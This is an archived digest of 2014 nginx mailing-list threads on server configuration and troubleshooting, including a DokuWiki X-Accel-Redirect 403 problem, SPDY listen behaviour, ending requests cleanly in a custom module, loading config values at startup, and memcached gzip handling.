using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the browser console shows various 403 Forbidden errors, and the nginx log is telling me the cause: "[...] 25108#0: *200 access forbidden by rule, client: XX.XX.XX.XX, server: wiki.example.com, request: "GET /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". I've got no clue how to debug this, to be honest. I didn't make any change, just upgraded one of the involved browsers. Could this be an incompatibility with this new Iceweasel version? Any ideas for this?
And one more question: I've tried (because of these failures) to enable spdy just on some vhosts, but it seems, enabling spdy in one of these makes all vhosts using it. Is this correct? Could I circumvent this using two ips, one spdy enabled, and one spdy disabled? Thanks in advance, cheers, Georg P.S.: Nginx is awesome - thanks for your work! [1] http://pastebin.com/raw.php?i=BPynrmLg -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 259 bytes Desc: OpenPGP digital signature URL: From vbart at nginx.com Wed Sep 3 20:23:32 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Thu, 04 Sep 2014 00:23:32 +0400 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" In-Reply-To: <54075B8A.2070304@riseup.net> References: <54075B8A.2070304@riseup.net> Message-ID: <2869527.IvnDEkO7Be@vbart-laptop> On Wednesday 03 September 2014 20:18:50 georg wrote: [..] > However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the > browser console reads various 403 forbidden, and the nginx log is > telling me the cause: "[...] 25108#0: *200 access forbidden by rule, > client: XX.XX.XX.XX, server: wiki.example.com, request: "GET > /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". > > I've got no clue how to debug this, to be honest. I didn't made any > change, just upgrading one of the involved browsers. > Could this be an incompatibility with this new Iceweasel version? > Any ideas for this? That's very strange. Could you provide a debug log? http://nginx.org/en/docs/debugging_log.html > > And one more question: I've tried (because of these failures) to enable > spdy just on some vhosts, but it seems, enabling spdy in one of these > makes all vhosts using it. Is this correct? Could I circumvent this > using two ips, one spdy enabled, and one spdy disabled? 
> Yes, this is correct and documented: http://nginx.org/r/listen Note that it "allows accepting SPDY connections on this port". And yes, two ips will help. wbr, Valentin V. Bartenev From viktor at szepe.net Wed Sep 3 20:23:33 2014 From: viktor at szepe.net (=?utf-8?b?U3rDqXBl?= Viktor) Date: Wed, 03 Sep 2014 22:23:33 +0200 Subject: NGINX + PHP-FPM error logs miss IP Message-ID: <20140903222333.Horde.hmTvcgUiq69hewWFlv_O8w1@szepe.net> Could it be that Apache 2.2 + mod_fastcgi + PHP-FPM logs IP addresses to error.log but NGINX + PHP-FPM does not? I mean not to a log file specified in the error_log configuration option. [03-Sep-2014 19:37:24 UTC] {message from e.g. error_log()} *no IP address in the line After commenting out the `error_log` config option, the error output got back to nginx: 2014/09/03 22:14:15 [error] 8831#0: *1 FastCGI sent in stderr: "PHP message: File does not exist: errorlog_url_hack (s:59:"//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js";) PHP message: File does not exist: nofollow_robot_trap PHP message: File does not exist: nofollow_robot_trap PHP message: File does not exist: nofollow_robot_trap PHP message: File does not exist: nofollow_robot_trap PHP message: File does not exist: nofollow_robot_trap PHP message: File does not exist: nofollow_robot_trap" while reading response header from upstream, client: 192.168.12.135, server: subdir.wp, request: "GET //ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "subdir.wp" There is no separate message for every line, so the output of several `error_log()` calls goes into one nginx error message. But there is a bit about the IP: `client: 192.168.12.135` Could you help me log IP addresses and log PHP's error messages as separate messages? Szépe Viktor -- +36-20-4242498 sms at szepe.net skype: szepe.viktor Budapest, XX.
ker?let From georg at riseup.net Wed Sep 3 21:50:07 2014 From: georg at riseup.net (georg) Date: Wed, 03 Sep 2014 23:50:07 +0200 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" In-Reply-To: <2869527.IvnDEkO7Be@vbart-laptop> References: <54075B8A.2070304@riseup.net> <2869527.IvnDEkO7Be@vbart-laptop> Message-ID: <54078D0F.908@riseup.net> Hi Valentin, Thanks for your help. On 09/03/2014 10:23 PM, Valentin V. Bartenev wrote: > On Wednesday 03 September 2014 20:18:50 georg wrote: > [..] >> However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the >> browser console reads various 403 forbidden, and the nginx log is >> telling me the cause: "[...] 25108#0: *200 access forbidden by rule, >> client: XX.XX.XX.XX, server: wiki.example.com, request: "GET >> /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". >> >> I've got no clue how to debug this, to be honest. I didn't made any >> change, just upgrading one of the involved browsers. >> Could this be an incompatibility with this new Iceweasel version? >> Any ideas for this? > > That's very strange. Could you provide a debug log? > http://nginx.org/en/docs/debugging_log.html Sure. I've posted it at [1], the log contains one access, just made with spdy enabled, and Iceweasel out of wheezy-backports. Greetings, Georg [1] http://pastebin.com/raw.php?i=ei9wHeAy -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 259 bytes Desc: OpenPGP digital signature URL: From vbart at nginx.com Wed Sep 3 22:04:09 2014 From: vbart at nginx.com (Valentin V. 
Bartenev) Date: Thu, 04 Sep 2014 02:04:09 +0400 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" In-Reply-To: <54078D0F.908@riseup.net> References: <54075B8A.2070304@riseup.net> <2869527.IvnDEkO7Be@vbart-laptop> <54078D0F.908@riseup.net> Message-ID: <3537417.Jba1i41uO8@vbart-laptop> On Wednesday 03 September 2014 23:50:07 georg wrote: > Hi Valentin, > > Thanks for your help. > > On 09/03/2014 10:23 PM, Valentin V. Bartenev wrote: > > On Wednesday 03 September 2014 20:18:50 georg wrote: > > [..] > >> However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the > >> browser console reads various 403 forbidden, and the nginx log is > >> telling me the cause: "[...] 25108#0: *200 access forbidden by rule, > >> client: XX.XX.XX.XX, server: wiki.example.com, request: "GET > >> /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". > >> > >> I've got no clue how to debug this, to be honest. I didn't made any > >> change, just upgrading one of the involved browsers. > >> Could this be an incompatibility with this new Iceweasel version? > >> Any ideas for this? > > > > That's very strange. Could you provide a debug log? > > http://nginx.org/en/docs/debugging_log.html > > Sure. I've posted it at [1], the log contains one access, just made with > spdy enabled, and Iceweasel out of wheezy-backports. > [..] It's not clear how it's related to SPDY and Iceweasel, but it looks like misconfiguration on your side. In the debug log I see that docuwiki returns X-Accel-Redirect to "/var/lib/dokuwiki/data/cache/.." which is matched by location ~/(data|conf|bin|inc)/ with a deny rule. wbr, Valentin V. Bartenev From vbart at nginx.com Wed Sep 3 22:39:26 2014 From: vbart at nginx.com (Valentin V. 
Bartenev) Date: Thu, 04 Sep 2014 02:39:26 +0400 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" In-Reply-To: <3537417.Jba1i41uO8@vbart-laptop> References: <54075B8A.2070304@riseup.net> <54078D0F.908@riseup.net> <3537417.Jba1i41uO8@vbart-laptop> Message-ID: <4102339.3vC8gBLauh@vbart-laptop> On Thursday 04 September 2014 02:04:09 Valentin V. Bartenev wrote: > On Wednesday 03 September 2014 23:50:07 georg wrote: > > Hi Valentin, > > > > Thanks for your help. > > > > On 09/03/2014 10:23 PM, Valentin V. Bartenev wrote: > > > On Wednesday 03 September 2014 20:18:50 georg wrote: > > > [..] > > >> However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the > > >> browser console reads various 403 forbidden, and the nginx log is > > >> telling me the cause: "[...] 25108#0: *200 access forbidden by rule, > > >> client: XX.XX.XX.XX, server: wiki.example.com, request: "GET > > >> /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". > > >> > > >> I've got no clue how to debug this, to be honest. I didn't made any > > >> change, just upgrading one of the involved browsers. > > >> Could this be an incompatibility with this new Iceweasel version? > > >> Any ideas for this? > > > > > > That's very strange. Could you provide a debug log? > > > http://nginx.org/en/docs/debugging_log.html > > > > Sure. I've posted it at [1], the log contains one access, just made with > > spdy enabled, and Iceweasel out of wheezy-backports. > > > [..] > > It's not clear how it's related to SPDY and Iceweasel, but it looks > like misconfiguration on your side. > > In the debug log I see that docuwiki returns X-Accel-Redirect to > "/var/lib/dokuwiki/data/cache/.." which is matched by location > ~/(data|conf|bin|inc)/ with a deny rule. > Well, I can guess that you have made some change that broke these resources, and haven't been noticed due to browser's cache. But update of the browser could result in reset of the cache. wbr, Valentin V. 
Bartenev From mdounin at mdounin.ru Thu Sep 4 01:10:02 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 4 Sep 2014 05:10:02 +0400 Subject: terminate a connection after sending headers In-Reply-To: References: <20140902130903.GI1849@mdounin.ru> Message-ID: <20140904011002.GX1849@mdounin.ru> Hello! On Wed, Sep 03, 2014 at 10:10:01AM -0400, erankor2 wrote: > Maxim, thank you very much for your response. > > To clarify - the problem is not about freeing the request (I don't think > there's a resource leak here), the problem is that the connection is just > left hanging until the client closes it / the server is restarted. > It is true that write_event_handler gets initialized to zero when the > request is allocated, but it is set to ngx_http_request_empty_handler before > the first line of my code even runs. In ngx_http_core_content_phase > there's: > > if (r->content_handler) { > r->write_event_handler = ngx_http_request_empty_handler; > ngx_http_finalize_request(r, r->content_handler(r)); > return NGX_OK; > } > > where r->content_handler is the entry point to my code. So, unless I > explicitly reset it back to NULL (something that I never saw in any other > nginx module) write_event_handler will not be null and the connection will > be left hanging. > > I forked some sample hello world module and modified it to reproduce the > problem, please check it out here: > https://github.com/erankor/nginx-hello-world-module/blob/master/ngx_http_hello_world_module.c > > In that code, I'm sending the response headers and then trigger a timer for > 1 second. In the timer callback I close the request with NGX_ERROR, but the > connection remains active (I used a timer here since that's the easiest > solution to defer the execution, in my real project I'm performing > asynchronous file I/O) The problem is that you use your own timer, and don't run posted requests after it - but the request termination code relies on posted requests being run. 
If you are using your own events, you should do processing similar to ngx_http_request_handler(), see src/http/ngx_http_request.c. Notably, you have to call the ngx_http_run_posted_requests() function after the code which calls ngx_http_finalize_request(). In this particular case, trivial fix is to do something like: static void event_callback(ngx_event_t *ev) { + ngx_connection_t *c; ngx_http_request_t *r = (ngx_http_request_t *)ev->data; + c = r->connection; + ngx_http_finalize_request(r, NGX_ERROR); + + ngx_http_run_posted_requests(c); } -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Thu Sep 4 05:07:26 2014 From: nginx-forum at nginx.us (igorclark) Date: Thu, 04 Sep 2014 01:07:26 -0400 Subject: Fetching HTTP value into config at start-up Message-ID: Hi all, I want to read some remote values via HTTP into nginx config variables, just once at nginx startup / reload time, and pass them as fastcgi_params into PHP scripts. I control the remote system, so I'll know if it needs to re-read and can send a HUP to nginx. I don't need it to happen every request though, because the value won't change for long periods - but it will change sometimes, and I don't want to have push more config out to multiple nginx servers if I can avoid it. Is there a way to do this that doesn't create problems? Here's what I've tried so far. 
This first one doesn't work, because the "API [is] disabled in the context of set_by_lua*": set_by_lua $config_variable " local result = ngx.location.capture('http://url.to.fetch/') return result " (Same with ngx.socket.*) This next one works; it feels horrible to do this, but if it was just once at start-up it might be OK - but this executes for every incoming request (confirmed by using /bin/date as the 'command' and just hitting refresh): set_by_lua $config_variable " local command = "/usr/bin/curl http://url.to.fetch/" local handle = io.popen(command) local result = handle:read("*a") handle:close() return result " Same for this one, it executes for every request: perl_set $config_variable ' sub { $var = `/bin/date`; return $var; } ' Is there a good way to do this, that only executes once, and doesn't have horrible shell interactions? Thanks very much for your help, Igor Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253063,253063#msg-253063 From oscaretu at gmail.com Thu Sep 4 06:37:10 2014 From: oscaretu at gmail.com (oscaretu .) Date: Thu, 4 Sep 2014 08:37:10 +0200 Subject: Fetching HTTP value into config at start-up In-Reply-To: References: Message-ID: Hello, igorclark. Perhaps you can create a shell script to launch nginx and, before that, execute a script that assigns an environment variable as the result of running a program, or creates (updates) a file that is included from the nginx config file at startup. Some ideas: http://nginx.2469901.n2.nabble.com/Want-to-access-UNIX-environment-variable-td7584005.html https://www.google.com/search?client=ubuntu&channel=fs&q=get+environment+variable+from+nginx&ie=utf-8&oe=utf-8 Greetings, Oscar On Thu, Sep 4, 2014 at 7:07 AM, igorclark wrote: > Hi all, > > I want to read some remote values via HTTP into nginx config variables, > just > once at nginx startup / reload time, and pass them as fastcgi_params into > PHP scripts.
I control the remote system, so I'll know if it needs to > re-read and can send a HUP to nginx. I don't need it to happen every > request > though, because the value won't change for long periods - but it will > change > sometimes, and I don't want to have push more config out to multiple nginx > servers if I can avoid it. > > Is there a way to do this that doesn't create problems? > > Here's what I've tried so far. > > This first one doesn't work, because the "API [is] disabled in the context > of set_by_lua*": > > set_by_lua $config_variable " > local result = ngx.location.capture('http://url.to.fetch/') > return result > " > > (Same with ngx.socket.*) > > This next one works; it feels horrible to do this but if it was just once > at > start-up, it might be OK - but this executes for every incoming request > (confirmed by using /bin/date as the 'command' and just hitting refresh): > > set_by_lua $config_variable " > local command = "/usr/bin/curl http://url.to.fetch/" > local handle = io.popen(command) > local result = handle:read("*a") > handle:close() > return result > " > > Same for this one, it executes for every request: > > perl_set $config_variable ' > sub { > $var = `/bin/date`; > return $var; > } > ' > > Is there a good way to do this, that only executes once, and doesn't have > horrible shell interactions? > > Thanks very much for your help, > Igor > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,253063,253063#msg-253063 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Oscar Fernandez Sierra oscaretu at gmail.com -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From cyrus_the_great at riseup.net Thu Sep 4 09:08:34 2014 From: cyrus_the_great at riseup.net (Cyrus) Date: Thu, 04 Sep 2014 19:08:34 +1000 Subject: bitwasp htaccess Message-ID: <54082C12.2070400@riseup.net> I've got a nice easy htaccess I need to convert to nginx. RewriteEngine On RewriteBase /bitwasp RewriteCond %{REQUEST_URI} ^system.* RewriteRule ^(.*)$ /index.php/$1 [L] # Checks to see if the user is attempting to access a valid file, # such as an image or css document; if this isn't true it sends the # request to index.php RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ index.php/$1 [L] # If we don't have mod_rewrite installed, all 404's # can be sent to index.php, and everything works as normal. # Submitted by: ElliotHaughin ErrorDocument 404 /index.php From nginx-forum at nginx.us Thu Sep 4 11:06:59 2014 From: nginx-forum at nginx.us (dedero) Date: Thu, 04 Sep 2014 07:06:59 -0400 Subject: Nginx as reverse proxy with apache Message-ID: Hello! I would like to ask you about a concern that I have and could not find anything about in the forums or Google. The situation is: I have already configured an Apache server with 2-step authentication and a reverse proxy, which is used as an additional security layer to enter a Remote Desktop Services infrastructure. I'm using a Remote Desktop web gateway application (from remotelabs), which is a web gateway working with websockets, and it connects to the remote desktop infrastructure. In summary: Internet --> Apache with 2-factor authentication and pwauth and reverse proxy --> remote desktop gateway --> remote desktop infrastructure. The problem is that, for some reason, everything works inside the infrastructure, but when I try to connect from outside (the internet) it doesn't work in the web gateway; it just cannot connect.
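[An aside on the gateway problem described above: WebSocket connections fail through proxies that speak HTTP/1.0 or drop the hop-by-hop Upgrade/Connection headers, which is the usual reason a websocket-based gateway works internally but not through an extra proxy layer. A minimal nginx sketch; the backend address is hypothetical, not from the post:

```nginx
location / {
    proxy_pass http://127.0.0.1:8080;         # hypothetical gateway backend
    proxy_http_version 1.1;                   # WebSockets require HTTP/1.1
    proxy_set_header Upgrade $http_upgrade;   # forward the client's upgrade request
    proxy_set_header Connection "upgrade";    # Connection is hop-by-hop, set it explicitly
    proxy_set_header Host $host;
}
```

]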
So the following step is to put Nginx in the middle as a reverse proxy, because the developer of the web gateway recommended that, since Nginx works better with websockets than Apache does. I was reading that it is possible to run Apache and Nginx on the same port by changing the listening IP addresses, but is it possible to use Nginx as a reverse proxy in front of Apache with ngx_http_auth_request_module? If so, is there any illustrative example of how to do this? Thanks a lot! Best regards, Bruno. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253070,253070#msg-253070 From nginx-forum at nginx.us Thu Sep 4 14:31:55 2014 From: nginx-forum at nginx.us (igorclark) Date: Thu, 04 Sep 2014 10:31:55 -0400 Subject: Fetching HTTP value into config at start-up In-Reply-To: References: Message-ID: <599653e24143fd948d27eaaa62b4e889.NginxMailingListEnglish@forum.nginx.org> Thanks Oscar. Yes, I'd read that first page and a bunch of those search results before. I guess I'll end up writing custom config files per environment, too, and maybe a script to regenerate and send a HUP to nginx when the data changes. I really wanted to avoid this because it's just one more moving part that I'd rather not have. It seems pretty reasonable to want to do this sort of thing just once at startup. Even getting an env variable for every HTTP request seems kind of an overhead, however tiny. Maybe I'll look at writing a module to do it some day. When I have enough time to learn how to write network-accessing ngx_* modules without breaking everything ;-) Anyway, if anyone knows of another way to do it, that'd be great, but in the meantime I appreciate your response. Thanks. Best, Igor Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253063,253073#msg-253073 From nginx-forum at nginx.us Thu Sep 4 14:39:03 2014 From: nginx-forum at nginx.us (LinU777) Date: Thu, 04 Sep 2014 10:39:03 -0400 Subject: nginx + memcached + gzip Message-ID: Hello. I have a service that uses memcached for storing large XML data.
The data is compressed in memcached. I want to send the response gzipped if the client supports that, and decompressed if not. But with my config the response always goes to the client decompressed. Here is my site config: server { listen 80; server_name static.app1.feeds.lan; location / { memcached_pass 10.10.0.11:11211; gunzip on; memcached_gzip_flag 2; gzip_static on; gzip on; gzip_proxied any; gzip_types "text/xml"; gzip_vary on; set $memcached_key "null"; if ($uri ~* "/uploads/(.*)/feed.xml") { set $memcached_key $1; } } } and the nginx config: user www-data; worker_processes 4; pid /run/nginx.pid; events { worker_connections 16384; # multi_accept on; } http { ## # Basic Settings ## sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; # server_tokens off; # server_names_hash_bucket_size 64; # server_name_in_redirect off; include /etc/nginx/mime.types; default_type application/octet-stream; ## # Logging Settings ## access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; ## # Gzip Settings ## gzip on; gzip_disable "msie6"; gzip_vary on; gzip_proxied any; gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript; ...
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253074,253074#msg-253074 From nginx-forum at nginx.us Thu Sep 4 14:42:30 2014 From: nginx-forum at nginx.us (LinU777) Date: Thu, 04 Sep 2014 10:42:30 -0400 Subject: nginx + memcached + gzip In-Reply-To: References: Message-ID: I have checked with curl: curl -I http://static.app1.feeds.lan/uploads/one_feed/1/feed.xml --compressed HTTP/1.1 200 OK Server: nginx/1.6.1 Date: Thu, 04 Sep 2014 14:39:54 GMT Content-Type: text/xml Connection: keep-alive Vary: Accept-Encoding curl -I http://static.app1.feeds.lan/uploads/one_feed/1/feed.xml HTTP/1.1 200 OK Server: nginx/1.6.1 Date: Thu, 04 Sep 2014 14:39:59 GMT Content-Type: text/xml Connection: keep-alive Vary: Accept-Encoding Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253074,253075#msg-253075 From georg at riseup.net Thu Sep 4 15:41:26 2014 From: georg at riseup.net (georg) Date: Thu, 04 Sep 2014 17:41:26 +0200 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" In-Reply-To: <4102339.3vC8gBLauh@vbart-laptop> References: <54075B8A.2070304@riseup.net> <54078D0F.908@riseup.net> <3537417.Jba1i41uO8@vbart-laptop> <4102339.3vC8gBLauh@vbart-laptop> Message-ID: <54088826.5060307@riseup.net> On 09/04/2014 12:39 AM, Valentin V. Bartenev wrote: > On Thursday 04 September 2014 02:04:09 Valentin V. Bartenev wrote: >> On Wednesday 03 September 2014 23:50:07 georg wrote: >>> On 09/03/2014 10:23 PM, Valentin V. Bartenev wrote: >>>> On Wednesday 03 September 2014 20:18:50 georg wrote: >>>> [..] >>>>> However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the >>>>> browser console reads various 403 forbidden, and the nginx log is >>>>> telling me the cause: "[...] 25108#0: *200 access forbidden by rule, >>>>> client: XX.XX.XX.XX, server: wiki.example.com, request: "GET >>>>> /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". >>>>> >>>>> I've got no clue how to debug this, to be honest. 
I didn't made any >>>>> change, just upgrading one of the involved browsers. >>>>> Could this be an incompatibility with this new Iceweasel version? >>>>> Any ideas for this? >>>> >>>> That's very strange. Could you provide a debug log? >>>> http://nginx.org/en/docs/debugging_log.html >>> >>> Sure. I've posted it at [1], the log contains one access, just made with >>> spdy enabled, and Iceweasel out of wheezy-backports. >>> >> [..] >> >> It's not clear how it's related to SPDY and Iceweasel, but it looks >> like misconfiguration on your side. >> >> In the debug log I see that docuwiki returns X-Accel-Redirect to >> "/var/lib/dokuwiki/data/cache/.." which is matched by location >> ~/(data|conf|bin|inc)/ with a deny rule. > > Well, I can guess that you have made some change that broke these resources, > and haven't been noticed due to browser's cache. > > But update of the browser could result in reset of the cache. I thought of something similar, and to be sure I've used the build-in "Restart with addons disabled"-function of Iceweasel. At starting up it will then offer two choices: Either start with addons disabled (so called "Safe Mode") or reset Iceweasel, which will clear all caches, settings, etc. Using the second option in Iceweasel out of wheezy (after I've downgraded Iceweasel out of backports to Iceweasel of of stable) didn't made a difference, all was fine, no errors reported. -------------- next part -------------- A non-text attachment was scrubbed... 
Name: signature.asc Type: application/pgp-signature Size: 259 bytes Desc: OpenPGP digital signature URL: From georg at riseup.net Thu Sep 4 15:56:26 2014 From: georg at riseup.net (georg) Date: Thu, 04 Sep 2014 17:56:26 +0200 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" In-Reply-To: <3537417.Jba1i41uO8@vbart-laptop> References: <54075B8A.2070304@riseup.net> <2869527.IvnDEkO7Be@vbart-laptop> <54078D0F.908@riseup.net> <3537417.Jba1i41uO8@vbart-laptop> Message-ID: <54088BAA.6090308@riseup.net> On 09/04/2014 12:04 AM, Valentin V. Bartenev wrote: > On Wednesday 03 September 2014 23:50:07 georg wrote: >> On 09/03/2014 10:23 PM, Valentin V. Bartenev wrote: >>> On Wednesday 03 September 2014 20:18:50 georg wrote: >>> [..] >>>> However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the >>>> browser console reads various 403 forbidden, and the nginx log is >>>> telling me the cause: "[...] 25108#0: *200 access forbidden by rule, >>>> client: XX.XX.XX.XX, server: wiki.example.com, request: "GET >>>> /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". >>>> >>>> I've got no clue how to debug this, to be honest. I didn't made any >>>> change, just upgrading one of the involved browsers. >>>> Could this be an incompatibility with this new Iceweasel version? >>>> Any ideas for this? >>> >>> That's very strange. Could you provide a debug log? >>> http://nginx.org/en/docs/debugging_log.html >> >> Sure. I've posted it at [1], the log contains one access, just made with >> spdy enabled, and Iceweasel out of wheezy-backports. >> > [..] > > It's not clear how it's related to SPDY and Iceweasel, but it looks > like misconfiguration on your side. Still I don't understand why enabling spdy makes this difference, and how this influences stuff like this, but... > In the debug log I see that docuwiki returns X-Accel-Redirect to > "/var/lib/dokuwiki/data/cache/.." which is matched by location > ~/(data|conf|bin|inc)/ with a deny rule. 
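[For reference, the usual way to keep a deny rule like this from breaking X-Accel-Redirect is to mark the location `internal` instead: nginx then returns 404 for direct client requests to it, but still serves it for internal redirects such as X-Accel-Redirect. A sketch only, based on the location pattern quoted above rather than the poster's actual config:

```nginx
location ~ /(data|conf|bin|inc)/ {
    internal;   # unreachable by clients directly, but usable via X-Accel-Redirect
}
```

]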
...you put me on the right track, Valentin! - These locations are denied because they contain, for example, content like cached pages that one could access without authorization. The wiki is closed; reading and editing are only possible after successful authentication, so that's why. - Dokuwiki supports a header "X-Accel-Redirect", which, when used, should speed up file transfers etc., because they are then handled directly by the webserver. Up until today I've used this setting. After disabling it, everything works like a charm, with all browsers (and different versions) I've tested (Chromium, Iceweasel, MSIE, Opera, Safari). - Still, I don't understand why using this feature (in combination with spdy) works in Iceweasel 24, but gives these failures in Iceweasel 31. Anyway, some more people seem to have problems with this (see [1] for example); at [2] and [3] you'll find a bug report and a follow-up, created in November 2011, fixed and closed in March 2014. I'm quite sure these changes haven't reached Debian Wheezy, leading to this problem. Thank you Valentin for your help - I'm fine. Cheers, Georg [1] http://forum.nginx.org/read.php?2,219485,219485#msg-219485 [2] https://bugs.dokuwiki.org/index.php?do=details&task_id=2388 [3] https://github.com/splitbrain/dokuwiki/pull/543 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 259 bytes Desc: OpenPGP digital signature URL: From nginx-forum at nginx.us Thu Sep 4 18:12:03 2014 From: nginx-forum at nginx.us (divya84) Date: Thu, 04 Sep 2014 14:12:03 -0400 Subject: Mapping requests and responses Message-ID: I am currently using nginx as a reverse proxy. I want to be able to map a request to its corresponding response. For example, I want to log some parts of a user request (say form field values in a POST request) along with the set-cookie that was set in the corresponding response header.
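[On the request/response mapping question above: much of this is possible without a custom module, since nginx exposes response headers as $sent_http_* variables and, for proxied requests whose body has been read, the body as $request_body, so a custom log_format can put both on one line. A sketch only; the upstream address and log path are hypothetical:

```nginx
# Log request body fields alongside the Set-Cookie header the upstream
# returned for the same request.
log_format reqresp '$remote_addr "$request" '
                   'body="$request_body" '
                   'set_cookie="$sent_http_set_cookie"';

server {
    listen 80;
    location / {
        proxy_pass http://127.0.0.1:8080;   # hypothetical upstream
        access_log /var/log/nginx/reqresp.log reqresp;
    }
}
```

]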
Would this be easy to create an add-on that performs this functionality. If yes, could you point me to any relevant modules that might help? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253080,253080#msg-253080 From nginx-forum at nginx.us Thu Sep 4 20:38:41 2014 From: nginx-forum at nginx.us (erankor2) Date: Thu, 04 Sep 2014 16:38:41 -0400 Subject: terminate a connection after sending headers In-Reply-To: <20140904011002.GX1849@mdounin.ru> References: <20140904011002.GX1849@mdounin.ru> Message-ID: <526de0a4342b2fea16d15520bd9c5095.NginxMailingListEnglish@forum.nginx.org> Thank you very much Maxim ! this works ! However, I bumped into a new problem, I use 2 different types of asyncronous operations in my code - file I/O and http requests. When I call ngx_http_run_posted_requests from the aio callback it works well, but when I call it from the HTTP completion callback it actually makes the request hang. I can see that it calls ngx_http_upstream_check_broken_connection in r->write_event_handler(r). I guess that in this case I should let ngx_http_run_posted_requests run from the upstream module instead of calling it myself. So my questions are: 1. Is there a simple rule that dictates when I should call ngx_http_run_posted_requests and when I should not ? I can work around the problem by doing something like 'if called from the aio callback call ngx_http_run_posted_requests' otherwise, don't call, but that doesn't feel like the correct solution. 2. A simpler solution that seems to work for me, is to call ngx_http_run_posted_requests only when I see that r->main->count is one (before finalize). But I don't know if that solution makes any sense - is there any relation between these posted_requests and the request count ? My understanding (before reading your reply :)) was that whenever I do something asynchronous I must increment the count, whenever I call finalize_request the count is decremented and once the count reaches zero the request is terminated. 
So, what I'm missing is why the termination of the request has to be deferred via posted requests - couldn't ngx_http_terminate_request just close the request only when it sees the count reached zero instead ? Thanks again for all your help, I really appreciate it ! Eran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253006,253081#msg-253081 From nginx-forum at nginx.us Fri Sep 5 00:49:09 2014 From: nginx-forum at nginx.us (useopenid) Date: Thu, 04 Sep 2014 20:49:09 -0400 Subject: nginx mail proxy - dovecot ssl backend In-Reply-To: References: <4ECFFD1E.2030002@yahoo.com.br> <9488c17d7cf4ee5a292ad097b1740294.NginxMailingListEnglish@forum.nginx.org> <42c203a0a7a1711d61fff1e4118ab921.NginxMailingListEnglish@forum.nginx.org> <4784f9fe36b38297a526f1ba7537a4a7.NginxMailingListEnglish@forum.nginx.org> Message-ID: <01877f9ad2f754ce06c078535332654b.NginxMailingListEnglish@forum.nginx.org> I'm getting errors when I try to get the diff, is it still available? Thanks... Posted at Nginx Forum: http://forum.nginx.org/read.php?2,219069,253082#msg-253082 From nginx-forum at nginx.us Fri Sep 5 03:53:43 2014 From: nginx-forum at nginx.us (dukzcry) Date: Thu, 04 Sep 2014 23:53:43 -0400 Subject: nginx mail proxy - dovecot ssl backend In-Reply-To: <01877f9ad2f754ce06c078535332654b.NginxMailingListEnglish@forum.nginx.org> References: <4ECFFD1E.2030002@yahoo.com.br> <9488c17d7cf4ee5a292ad097b1740294.NginxMailingListEnglish@forum.nginx.org> <42c203a0a7a1711d61fff1e4118ab921.NginxMailingListEnglish@forum.nginx.org> <4784f9fe36b38297a526f1ba7537a4a7.NginxMailingListEnglish@forum.nginx.org> <01877f9ad2f754ce06c078535332654b.NginxMailingListEnglish@forum.nginx.org> Message-ID: <281e9d10b14cad10fa7ede612c0d25ac.NginxMailingListEnglish@forum.nginx.org> Yes, but got moved. 
